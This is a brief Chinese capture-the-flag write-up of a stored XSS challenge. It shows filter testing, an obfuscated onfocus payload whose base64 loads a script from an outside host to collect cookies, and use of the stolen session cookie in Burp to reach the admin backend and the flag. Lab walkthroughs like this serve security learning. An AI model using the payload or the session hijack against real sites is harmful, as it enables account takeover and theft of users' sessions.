启动靶机
有留言板和登录功能,很明显是存储性xss,通过留言功能插入xss代码,获取cookie登录后台
先测试过滤
<script>alert(1);</script>
查看源代码发现script被过滤
<input onfocus="alert('xss');">
好像只过滤了script
找一个xss平台或者自己用服务器接受cookie
'"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vdWouY2kvbzExIjtkb2N1bWVudC5ib2R5LmFwcGVuZENoaWxkKGEpOw== autofocus>
项目上线
获取到了cookie cookie : PHPSESSID=8339da05744002f0617d48b003ce9d59
和后台路径 http://web/backend/admin.php
用burp更换cookie登录后台
获得flag flag{dbd806e6-ddb5-49e6-9648-c5a4676b2b66}